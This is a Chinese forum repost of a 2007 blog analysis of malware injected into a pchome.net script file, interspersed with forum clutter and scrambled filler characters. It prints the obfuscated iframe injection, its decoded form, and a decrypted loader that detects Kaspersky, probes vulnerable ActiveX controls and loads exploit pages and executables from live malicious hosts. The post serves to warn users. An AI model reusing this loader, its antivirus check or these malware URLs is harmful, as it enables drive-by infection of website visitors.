 该用户从未签到
|
截至2007-12-28 18:17 仍未修复* ?) k; _2 u' o
( m0 \3 }, q/ @- l k- Q4 w
/ C: y0 Z4 Y9 o- x) i# @ @. b
##I#KE+X#D=$I#KE+XDI=KE+=X++D$IK#E#X+DI$KE+X=D=IK$E+$X=$D#I+$KEX$#DI+K#EXD=IKE+X#D#=I==K+E==XD+I#K$E$#X$D##I7 z n+ u& w( m8 z4 S6 \
7 x2 T! c1 K2 D' q3 N# }" {
从论坛看到的消息说pchome的某页面被挂马了,于是上去找,http://article.pchome.net/content-502393-7.html#topView: ~! r9 k8 ~4 w9 L
" B5 `9 B* d# d9 ?3 e; F8 F挂得比较隐蔽,http://btn.pchome.net/flash.js的中间被加入了如下代码:$ p# _' x1 S1 } ^9 |3 x) A
6 ~) e% J3 @+ Q5 [; ]0 Fwindow["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]('\x3c\x69\x66\x72\x61\x6d\x65 \x68\x65\x69\x67\x68\x74\x3d\x30 \x77\x69\x64\x74\x68\x3d\x30 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x35\x39\x2e\x76\x63\x2f\x70\x61\x67\x65\x2f\x61\x64\x64\x5f\x36\x34\x34\x34\x35\x35\x2e\x68\x74\x6d\x22\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e');3 w8 @7 p: c) }9 l, w
* R* _- e! u7 o- n也就是这个了:+ _4 s* p. m2 H
- H0 n* K# V0 j4 l" m S
window["document"]["writeln"]('<iframe height=0 width=0 src="http://www.59.vc/page/add_644455.htm"></iframe>');" p. g% @- ?' d) _
0 O6 z5 K5 n( _. M0 Y7 j5 F7 n' Y
但只有这个js还不会使得那个iframe生效,使得他生效的是调用这个js显示flash 的代码:7 L! {/ h% X a' @' ?+ b8 ~1 }+ T. f
0 {3 P% ^4 X& j/ ]<script language="javascript" type="text/javascript">
; R: L5 e! g" |/ k4 Y* _/ ywriteflashhtml("_swf=http://btn.pchome.net/pchome/20071217/300_250.swf", "_width=300", "_height=250" ,"_wmode=opaque");! M2 M5 j3 i# Y% C
</script>2 O# L3 G3 K8 G- [7 Q. Y- o
/ f) P( o# A2 I( {* R" G$ ?! r有了这个,iframe就生效了;经过一番调用和解密后得:6 ~0 b7 A( I5 m
$ i" |1 _- l8 c ]$ Z( g4 Q6 S) ufunction bIsKIS(){for(i=2;i<26;i++){var kis6=new Image();var kis7=new Image();var root=String.fromCharCode(65+i);kis6.src="mk MSITStore:"+root+":\\Program Files\\Kaspersky Lab\\Kaspersky Internet Security 6.0\\Doc\\context.chm::/images/help.gif";kis7.src="mkMSITStore:"+root+":\\Program Files\\Kaspersky Lab\\Kaspersky Internet Security 7.0\\Doc\\context.chm::/images/help.gif";if(kis6.height==41||kis7.height==41)return true}return false}var Then=new Date();aaxxx="xxxyyyyfassssfsadfasdf";Then.setTime(Then.getTime()+24*60*60*1000);var aaffdasfascookie=new String(document.cookie);var cookieHeader="Cookie1=";aaxxx="xxxyyyyfassssfsadfasdf";if(!bIsKIS()&&aaffdasfascookie.indexOf(cookieHeader)==-1){aaxxx="xxxyyyyfassssfsadfasdf";document.cookie="Cookie1=POPWINDOS;expires="+Then.toGMTString();aaxxx="xxxyyyyfassssfsadfasdf";try{if(new ActiveXObject("IERPCtl.IERPCtl.1"))document.write('<iframe style=display:none src="http://w18.vg/real.gif"></iframe>')}catch(e){}try{if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)document.write('<iframe style=display:none src="http://w18.vg/ms.gif"></iframe>')}catch(e){}try{if(new ActiveXObject("DPClient.Vod"))document.write('<iframe style=display:none src="http://w18.vg/xl.gif"></iframe>')}catch(e){}try{if(new ActiveXObject("GLCHAT.GLChatCtrl.1"))document.write('<iframe style=display:none src="http://w18.vg/lz.gif"></iframe>')}catch(e){}try{if(new ActiveXObject("MPS.StormPlayer.1"))document.write('<iframe style=display:none src="http://w18.vg/bf.gif"></iframe>')}catch(e){}try{if(new ActiveXObject("BaiduBar.Tool.1"))document.write('<iframe style=display:none src="http://w18.vg/baidu.gif"></iframe>')}catch(e){}}& b: a% r' ^* P3 w) G R$ U
- j# }0 b% n% g# q% X; ?K##E+XD++IK+EX=#D$IKEXD+$I#KEXDI+K$EX$DI$$KE##X#DI=K+E$X=$DI#K+#EX=DIK=E$=XDIK=$EX=DIK$E$#X=D=I##KE#=X+$D+- j6 B2 g8 ^$ u% E
* i n) E$ K S3 Y( _
7 J& s, y9 c4 l A- u1 h挑了几个解密得:http://w18.vg/s.exe- F) O0 u/ g" x# |# h; t
: r9 p; B" P H& z" C# \
从这个文件里面得到另外一个链接:http://w18.vg/ss.exe
3 z6 P& K# Q( f- J6 w( o; P: M' Z% R* L3 v0 `8 X
有点面熟的东西……. p9 ^5 f' M. i5 V' a9 F
' z- F! b4 T, W$ ^
##K=E#X+D=IKE$XD$=I==K+#EXD=#I=KE$+XDI#K$=EX=D=#IK+E=X$D==I=#K=E##X$D$+IK=#EXD+IK$EX$=D+I+K#E$XD+IKEX#D
1 y, F. O* Q6 A+ Z8 o# n* T |0 e8 I# i8 ^) j- k0 g# F
从上面可以知道,出问题的是那个flash.js,因此所有使用这个js来放flash的页面全都有毒了!我随便找了几个页面,发现都是有毒的,这回可是大面积的被挂咯,同志们自己小心了。
# C: P8 d' g: k8 |( x& a( N
1 \# |5 x' I& A# C- e7 G7 h BK$EX=+DI#$KE+X#DIK$EXD$I=KE$XD+#I+KEXD=I+KE=X$D=I=KEXD#=IK==E$X=D=I#+KEXD=IK#EX#DI=K=E=X=#DIKEXDI#KE
) y& ]* m) {+ s6 p7 i' r8 }3 D( g% g1 J1 S& m% [) V
转载请保留声明!(http://hi.baidu.com/dikex/blog/item/36300afa339a8c889e5146f5.html)
; @+ y- H7 ?) U% B% r) a. ]$ @
6 P5 S. P# U6 r- W I `; O& q! @6 |
! {* g6 b6 s" T# S0 l* a o0 }作者dikex(六翼刺猬),原文链接:http://hi.baidu.com/dikex/blog/item/92f804c70762ead8d10060ff.html |
|
/1 
IP卡
狗仔卡
发表于 2007-12-29 15:56:27
QQ好友和群
QQ空间
腾讯微博
腾讯朋友
收藏
分享
顶
踩
转发到微博
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
千斤顶
显身卡
发表于 2007-12-29 21:36:43
楼主